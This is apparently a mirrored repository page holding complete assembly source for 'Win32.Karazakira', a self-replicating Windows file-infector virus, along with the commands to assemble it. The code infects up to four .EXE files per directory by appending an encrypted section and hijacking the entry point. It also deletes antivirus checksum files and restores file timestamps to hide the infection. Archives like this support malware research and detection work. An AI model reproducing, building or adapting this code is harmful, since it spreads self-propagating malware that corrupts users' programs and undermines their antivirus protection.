mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
568 lines
14 KiB
NASM
568 lines
14 KiB
NASM
|
; _ __ ____ __ ___ __ _ _ ____ __
|
||
|
; | |/\ / \ | _ \ / \ / _ \ / \ | |/\ | | | _ \ / \
|
||
|
; | _/ | || | | / | || | |// / | || | | _/ | | | / | || |
|
||
|
; | \ | | | |\ \ | | / /|\ | | | \ | | | |\ \ | |
|
||
|
; |_|\/ |_||_| |_||_| |_||_| /____/ |_||_| |_|\/ |_| |_||_| |_||_|
|
||
|
; By Psychologic/rRlf
|
||
|
;
|
||
|
|
||
|
; Kara-Intro :
|
||
|
;
|
||
|
; This is my 3rd win32asm virus, I named it as an Indian's ring "KARAZAKIRA"
|
||
|
; which belived can call a soul from the deathman (a man who has been die)
|
||
|
; well, I think this is unique name.
|
||
|
|
||
|
|
||
|
; Workz :
|
||
|
;
|
||
|
; When Karazakira file executed, Karazakira searches for 4 PE *.EXE files in the current
|
||
|
; and windows directory. Those files will be infected by adding a new section called
|
||
|
; ".Karazakira" (called in infect section as ptr [edi], "raK.").
|
||
|
; File modification works by direct access, not by memory mapping (Bad idea right..??)
|
||
|
; well it just for different touch, hehe :P
|
||
|
|
||
|
; Feature :
|
||
|
;
|
||
|
; * full Win32 compatible
|
||
|
; * encrypted using DIV algorithm
|
||
|
; * Infecting windows directory
|
||
|
; * Deleting some AV checksum files
|
||
|
|
||
|
; Compile :
|
||
|
;
|
||
|
; tasm32 /mx /m karazakira.asm
|
||
|
; tlink32 /Tpe /aa karazakira.obj,,, import32.lib
|
||
|
|
||
|
; ====================================================================================
|
||
|
; ====================================================================================
|
||
|
;
|
||
|
; ====================================================================================
|
||
|
; ====================================================================================
|
||
|
|
||
|
|
||
|
length_virus_file EQU (end_static - start)
|
||
|
length_virus_mem EQU (end_mem - start)
|
||
|
length_encrypted EQU (end_encrypted - encrypted)
|
||
|
length_PE_header EQU 1000
|
||
|
|
||
|
Extrn MessageBoxA:Proc
|
||
|
Extrn ExitProcess:Proc
|
||
|
|
||
|
.386p
|
||
|
.model flat
|
||
|
|
||
|
.data
|
||
|
start:
|
||
|
pushad
|
||
|
pushfd
|
||
|
|
||
|
db 0BDh
|
||
|
delta_offset dd 0
|
||
|
|
||
|
lea esi, [ebp+offset encrypted]
|
||
|
mov edi, esi
|
||
|
mov ecx, length_encrypted / 8
|
||
|
db 0BBh
|
||
|
crypt_key dd 0
|
||
|
|
||
|
|
||
|
rush_code:
|
||
|
copyright db "Win32.Karazakira By Psychologic", 0
|
||
|
db "On Friday, second January '05 - Depok City, Indonesia", 0
|
||
|
|
||
|
GetProcAddress db "GetProcAddress", 0
|
||
|
l_GPA = $ - offset GetProcAddress
|
||
|
|
||
|
FindFirstFileA db "FindFirstFileA", 0
|
||
|
FindNextFileA db "FindNextFileA", 0
|
||
|
FindClose db "FindClose", 0
|
||
|
CreateFileA db "CreateFileA", 0
|
||
|
CloseHandle db "CloseHandle", 0
|
||
|
ReadFile db "ReadFile", 0
|
||
|
WriteFile db "WriteFile", 0
|
||
|
DeleteFileA db "DeleteFileA", 0
|
||
|
SetFilePointer db "SetFilePointer", 0
|
||
|
SetFileAttributesA db "SetFileAttributesA", 0
|
||
|
SetFileTime db "SetFileTime", 0
|
||
|
SetCurrentDirectoryA db "SetCurrentDirectoryA", 0
|
||
|
GetCurrentDirectoryA db "GetCurrentDirectoryA", 0
|
||
|
GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
|
||
|
GetSystemDirectoryA db "GetSystemDirectoryA", 0
|
||
|
GetTickCount db "GetTickCount", 0
|
||
|
|
||
|
anti_vir_dat db "ANTI-VIR.DAT", 0
|
||
|
chklist_ms db "CHKLIST.MS", 0
|
||
|
chklist_cps db "CHKLIST.CPS", 0
|
||
|
avp_crc db "AVP.CRC", 0
|
||
|
|
||
|
orig_eip dd offset quit_1st_gen
|
||
|
filemask db "*.EXE", 0
|
||
|
|
||
|
new_section_header:
|
||
|
db ".Karazakira", 0, 0
|
||
|
VirtualSize dd length_virus_mem
|
||
|
VirtualAddress dd 0
|
||
|
PhysicalSize dd length_virus_file
|
||
|
PhysicalAddress dd 0
|
||
|
dd 0, 0, 0
|
||
|
dd 0E0000020h
|
||
|
|
||
|
if ((($-encrypted) mod 8) NE 0)
|
||
|
db (8-(($-encrypted) mod 8)) dup(0)
|
||
|
endif
|
||
|
|
||
|
decrypt:
|
||
|
lodsd
|
||
|
xchg eax, edx
|
||
|
lodsd
|
||
|
cmp edx, ebx
|
||
|
JA no_mul
|
||
|
push ebx
|
||
|
push edx
|
||
|
mul ebx
|
||
|
pop ebx
|
||
|
add eax, ebx
|
||
|
adc edx, 0
|
||
|
pop ebx
|
||
|
stosd
|
||
|
xchg eax, edx
|
||
|
stosd
|
||
|
LOOP decrypt
|
||
|
JMP encrypted
|
||
|
|
||
|
no_mul:
|
||
|
stosd
|
||
|
xchg eax, edx
|
||
|
stosd
|
||
|
LOOP decrypt
|
||
|
|
||
|
encrypted:
|
||
|
mov eax, [ebp+offset orig_eip]
|
||
|
mov [ebp+offset host_entry], eax
|
||
|
push offset seh_handler
|
||
|
push dword ptr fs:[0]
|
||
|
mov fs:[0], esp
|
||
|
mov eax, [esp+11*4]
|
||
|
|
||
|
scan_kernel:
|
||
|
cmp word ptr [eax], "ZM"
|
||
|
JNE kernel_not_found
|
||
|
mov ebx, [eax+3Ch]
|
||
|
add ebx, eax
|
||
|
cmp dword ptr [ebx], "EP"
|
||
|
JE kernel32_found
|
||
|
|
||
|
kernel_not_found:
|
||
|
dec eax
|
||
|
JMP scan_kernel
|
||
|
|
||
|
kernel32_found:
|
||
|
mov [ebp+offset kernel32], eax
|
||
|
mov ebx, [ebx+120]
|
||
|
add ebx, eax
|
||
|
mov edx, [ebx+20h]
|
||
|
add edx, eax
|
||
|
mov ecx, [ebx+18h]
|
||
|
|
||
|
GPA_search:
|
||
|
push ecx
|
||
|
mov esi, [edx]
|
||
|
add esi, eax
|
||
|
lea edi, [ebp+offset GetProcAddress]
|
||
|
mov ecx, l_GPA
|
||
|
cld
|
||
|
rep cmpsb
|
||
|
pop ecx
|
||
|
JE GPA_found
|
||
|
inc edx
|
||
|
inc edx
|
||
|
inc edx
|
||
|
inc edx
|
||
|
LOOP GPA_search
|
||
|
|
||
|
GPA_not_found:
|
||
|
JMP return_to_host
|
||
|
|
||
|
GPA_found:
|
||
|
mov edx, [ebx+18h]
|
||
|
sub edx, ecx
|
||
|
shl edx, 1
|
||
|
add edx, [ebx+24h]
|
||
|
add edx, eax
|
||
|
xor ecx, ecx
|
||
|
mov cx, [edx]
|
||
|
shl ecx, 2
|
||
|
add ecx, [ebx+1Ch]
|
||
|
add ecx, eax
|
||
|
mov ebx, [ecx]
|
||
|
add ebx, eax
|
||
|
mov [ebp+offset GPA_addr], ebx
|
||
|
lea eax, [ebp+offset curdir]
|
||
|
push eax
|
||
|
push 260
|
||
|
lea eax, [ebp+offset GetCurrentDirectoryA]
|
||
|
call call_API
|
||
|
push 260
|
||
|
lea eax, [ebp+offset windir]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset GetWindowsDirectoryA]
|
||
|
call call_API
|
||
|
lea eax, [ebp+offset windir]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset SetCurrentDirectoryA]
|
||
|
call call_API
|
||
|
call infect_dir
|
||
|
lea eax, [ebp+offset curdir]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset SetCurrentDirectoryA]
|
||
|
call call_API
|
||
|
call infect_dir
|
||
|
|
||
|
return_to_host:
|
||
|
pop dword ptr fs:[0]
|
||
|
pop eax
|
||
|
popfd
|
||
|
popad
|
||
|
db 068h
|
||
|
host_entry dd 0
|
||
|
ret
|
||
|
|
||
|
seh_handler:
|
||
|
mov esp, [esp+8]
|
||
|
JMP return_to_host
|
||
|
|
||
|
infect_dir:
|
||
|
mov dword ptr [ebp+infectioncount], 4
|
||
|
lea eax, [ebp+offset anti_vir_dat]
|
||
|
call kill_file
|
||
|
lea eax, [ebp+offset chklist_ms]
|
||
|
call kill_file
|
||
|
lea eax, [ebp+offset chklist_cps]
|
||
|
call kill_file
|
||
|
lea eax, [ebp+offset avp_crc]
|
||
|
call kill_file
|
||
|
lea eax, [ebp+offset find_data]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset filemask]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset FindFirstFileA]
|
||
|
call call_API
|
||
|
mov [ebp+offset search_handle], eax
|
||
|
inc eax
|
||
|
JZ end_infect_dir
|
||
|
|
||
|
infect:
|
||
|
push 80h
|
||
|
lea eax, [ebp+offset FileName]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset SetFileAttributesA]
|
||
|
call call_API
|
||
|
push 0
|
||
|
push 80h
|
||
|
push 3
|
||
|
push 0
|
||
|
push 0
|
||
|
push 0C0000000h
|
||
|
lea eax, [ebp+offset FileName]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset CreateFileA]
|
||
|
call call_API
|
||
|
mov [ebp+offset file_handle], eax
|
||
|
inc eax
|
||
|
JZ restore_attributes
|
||
|
push 0
|
||
|
lea eax, [ebp+offset bytes_read]
|
||
|
push eax
|
||
|
push 64
|
||
|
lea eax, [ebp+offset dos_header]
|
||
|
push eax
|
||
|
push [ebp+file_handle]
|
||
|
lea eax, [ebp+offset ReadFile]
|
||
|
call call_API
|
||
|
cmp word ptr [ebp+offset exe_marker], "ZM"
|
||
|
JNE close
|
||
|
push 0
|
||
|
push 0
|
||
|
push dword ptr [ebp+offset new_header]
|
||
|
push dword ptr [ebp+offset file_handle]
|
||
|
lea eax, [ebp+offset SetFilePointer]
|
||
|
call call_API
|
||
|
push 0
|
||
|
lea eax, [ebp+offset bytes_read]
|
||
|
push eax
|
||
|
push length_pe_header
|
||
|
lea eax, [ebp+offset pe_header]
|
||
|
push eax
|
||
|
push dword ptr [ebp+file_handle]
|
||
|
lea eax, [ebp+offset ReadFile]
|
||
|
call call_API
|
||
|
cmp dword ptr [ebp+offset pe_marker], "EP"
|
||
|
JNE close
|
||
|
test word ptr [ebp+offset flags], 0010000000000000b
|
||
|
JNZ close
|
||
|
lea ebx, [ebp+offset optional_header]
|
||
|
add bx, word ptr [ebp+offset SizeOfOptHeader]
|
||
|
xor eax, eax
|
||
|
mov ax, word ptr [ebp+offset NumberOfSections]
|
||
|
dec eax
|
||
|
mov ecx, 40
|
||
|
mul ecx
|
||
|
add eax, ebx
|
||
|
mov edi, eax
|
||
|
cmp dword ptr [edi], "raK."
|
||
|
JE close
|
||
|
mov eax, [ebp+offset EntryPoint]
|
||
|
add eax, [ebp+offset ImageBase]
|
||
|
mov [ebp+offset orig_eip], eax
|
||
|
inc word ptr [ebp+offset NumberOfSections]
|
||
|
mov eax, [edi+12]
|
||
|
add eax, [edi+8]
|
||
|
mov ebx, [ebp+offset SectionAlign]
|
||
|
call align_EAX
|
||
|
mov [ebp+offset VirtualAddress], eax
|
||
|
mov [ebp+offset EntryPoint], eax
|
||
|
add eax, [ebp+offset ImageBase]
|
||
|
sub eax, offset start
|
||
|
mov [ebp+offset delta_offset], eax
|
||
|
mov eax, length_virus_mem
|
||
|
call align_EAX
|
||
|
add dword ptr [ebp+offset SizeOfImage], EAX
|
||
|
mov eax, [edi+20]
|
||
|
add eax, [edi+16]
|
||
|
mov ebx, [ebp+offset FileAlign]
|
||
|
call align_EAX
|
||
|
mov [ebp+offset PhysicalAddress], eax
|
||
|
push 0
|
||
|
push 0
|
||
|
push eax
|
||
|
push dword ptr [ebp+offset file_handle]
|
||
|
lea eax, [ebp+offset SetFilePointer]
|
||
|
call call_API
|
||
|
mov eax, length_virus_file
|
||
|
call align_EAX
|
||
|
mov [ebp+PhysicalSize], eax
|
||
|
mov ecx, 40
|
||
|
lea esi, [ebp+offset new_section_header]
|
||
|
add edi, ecx
|
||
|
cld
|
||
|
pusha
|
||
|
xor eax, eax
|
||
|
repe scasb
|
||
|
popa
|
||
|
JNE close
|
||
|
rep movsb
|
||
|
push eax
|
||
|
lea eax, [ebp+offset GetTickCount]
|
||
|
call call_API
|
||
|
mov ebx, eax
|
||
|
ror eax, 8
|
||
|
xor ebx, eax
|
||
|
mov [ebp+offset crypt_key], ebx
|
||
|
lea esi, [ebp+offset start]
|
||
|
lea edi, [ebp+offset crypt_buffer]
|
||
|
mov ecx, length_virus_file
|
||
|
rep movsb
|
||
|
lea esi, [ebp+offset crypt_buffer+(encrypted-start)]
|
||
|
mov edi, esi
|
||
|
mov cx, length_encrypted / 8
|
||
|
|
||
|
encrypt:
|
||
|
lodsd
|
||
|
xchg eax, edx
|
||
|
lodsd
|
||
|
xchg eax, edx
|
||
|
cmp edx, ebx
|
||
|
JA no_div
|
||
|
div ebx
|
||
|
|
||
|
no_div:
|
||
|
xchg eax, edx
|
||
|
stosd
|
||
|
xchg eax, edx
|
||
|
stosd
|
||
|
loop encrypt
|
||
|
pop eax
|
||
|
push 0
|
||
|
lea ecx, [ebp+offset bytes_read]
|
||
|
push ecx
|
||
|
push eax
|
||
|
lea eax, [ebp+offset crypt_buffer]
|
||
|
push eax
|
||
|
push dword ptr [ebp+file_handle]
|
||
|
lea eax, [ebp+offset WriteFile]
|
||
|
call call_API
|
||
|
push 0
|
||
|
push 0
|
||
|
push dword ptr [ebp+offset new_header]
|
||
|
push dword ptr [ebp+offset file_handle]
|
||
|
lea eax, [ebp+offset SetFilePointer]
|
||
|
call call_API
|
||
|
push 0
|
||
|
lea eax, [ebp+offset bytes_read]
|
||
|
push eax
|
||
|
push length_pe_header
|
||
|
lea eax, [ebp+offset pe_header]
|
||
|
push eax
|
||
|
push dword ptr [ebp+file_handle]
|
||
|
lea eax, [ebp+offset WriteFile]
|
||
|
call call_API
|
||
|
dec dword ptr [ebp+infectioncount]
|
||
|
|
||
|
close:
|
||
|
lea eax, [ebp+offset LastWriteTime]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset LastAccessTime]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset CreationTime]
|
||
|
push eax
|
||
|
push dword ptr [ebp+offset file_handle]
|
||
|
lea eax, [ebp+offset SetFileTime]
|
||
|
call call_API
|
||
|
push dword ptr [ebp+offset file_handle]
|
||
|
lea eax, [ebp+offset CloseHandle]
|
||
|
call call_API
|
||
|
|
||
|
restore_attributes:
|
||
|
push dword ptr [ebp+offset FileAttributes]
|
||
|
lea eax, [ebp+offset FileName]
|
||
|
push eax
|
||
|
lea eax, [ebp+offset SetFileAttributesA]
|
||
|
call call_API
|
||
|
|
||
|
find_next:
|
||
|
mov ecx, [ebp+infectioncount]
|
||
|
JCXZ close_find
|
||
|
lea eax, [ebp+offset find_data]
|
||
|
push eax
|
||
|
push dword ptr [ebp+offset search_handle]
|
||
|
lea eax, [ebp+offset FindNextFileA]
|
||
|
call call_API
|
||
|
dec eax
|
||
|
JZ infect
|
||
|
|
||
|
close_find:
|
||
|
push dword ptr [ebp+offset search_handle]
|
||
|
lea eax, [ebp+offset FindClose]
|
||
|
call call_API
|
||
|
|
||
|
end_infect_dir:
|
||
|
ret
|
||
|
|
||
|
kill_file:
|
||
|
push eax
|
||
|
push 80h
|
||
|
push eax
|
||
|
lea eax, [ebp+offset SetFileAttributesA]
|
||
|
call call_API
|
||
|
lea eax, [ebp+offset DeleteFileA]
|
||
|
call call_API
|
||
|
RET
|
||
|
|
||
|
call_API:
|
||
|
push eax
|
||
|
push dword ptr [ebp+offset kernel32]
|
||
|
call [ebp+offset GPA_addr]
|
||
|
JMP eax
|
||
|
|
||
|
align_EAX:
|
||
|
xor edx, edx
|
||
|
div ebx
|
||
|
or edx, edx
|
||
|
JZ no_round_up
|
||
|
inc eax
|
||
|
|
||
|
no_round_up:
|
||
|
mul ebx
|
||
|
RET
|
||
|
|
||
|
|
||
|
end_encrypted:
|
||
|
end_static:
|
||
|
|
||
|
heap:
|
||
|
crypt_buffer db length_virus_file dup(?)
|
||
|
|
||
|
padding db 1024 dup(?)
|
||
|
|
||
|
windir db 260 dup(?)
|
||
|
curdir db 260 dup(?)
|
||
|
|
||
|
kernel32 dd ?
|
||
|
GPA_addr dd ?
|
||
|
|
||
|
search_handle dd ?
|
||
|
file_handle dd ?
|
||
|
bytes_read dd ?
|
||
|
infectioncount dd ?
|
||
|
|
||
|
find_data:
|
||
|
FileAttributes dd ?
|
||
|
CreationTime dq ?
|
||
|
LastAccessTime dq ?
|
||
|
LastWriteTime dq ?
|
||
|
FileSize dq ?
|
||
|
wfd_reserved dq ?
|
||
|
FileName db 260 dup(?)
|
||
|
DosFileName db 14 dup(?)
|
||
|
|
||
|
dos_header:
|
||
|
exe_marker dw ?
|
||
|
dosheader_shit db 58 dup(?)
|
||
|
new_header dd ?
|
||
|
|
||
|
pe_header:
|
||
|
pe_marker dd ?
|
||
|
machine dw ?
|
||
|
NumberOfSections dw ?
|
||
|
TimeDateStamp dd ?
|
||
|
DebugShit dq ?
|
||
|
SizeOfOptHeader dw ?
|
||
|
flags dw ?
|
||
|
optional_header:
|
||
|
optional_magic dw ?
|
||
|
linkerversion dw ?
|
||
|
SizeOfCode dd ?
|
||
|
SizeOfDATA dd ?
|
||
|
SizeOfBSS dd ?
|
||
|
EntryPoint dd ?
|
||
|
BaseOfCode dd ?
|
||
|
BaseOfData dd ?
|
||
|
ImageBase dd ?
|
||
|
SectionAlign dd ?
|
||
|
FileAlign dd ?
|
||
|
OSVersion dd ?
|
||
|
OurVersion dd ?
|
||
|
SubVersion dd ?
|
||
|
reserved1 dd ?
|
||
|
SizeOfImage dd ?
|
||
|
SizeOfHeader dd ?
|
||
|
Checksum dd ?
|
||
|
|
||
|
org offset pe_header+length_pe_header
|
||
|
|
||
|
end_mem:
|
||
|
.code
|
||
|
start_1st_gen:
|
||
|
pushad
|
||
|
pushfd
|
||
|
xor ebp, ebp
|
||
|
JMP encrypted
|
||
|
|
||
|
quit_1st_gen:
|
||
|
push 0
|
||
|
push offset caption
|
||
|
push offset message
|
||
|
push 0
|
||
|
call MessageBoxA
|
||
|
push 0
|
||
|
call ExitProcess
|
||
|
|
||
|
caption:
|
||
|
db "Win32.Karazakira by Psychologic"
|
||
|
db 0
|
||
|
message db "Freee palestine...freee palestine", 0
|
||
|
|
||
|
end start_1st_gen
|
||
|
|
||
|
|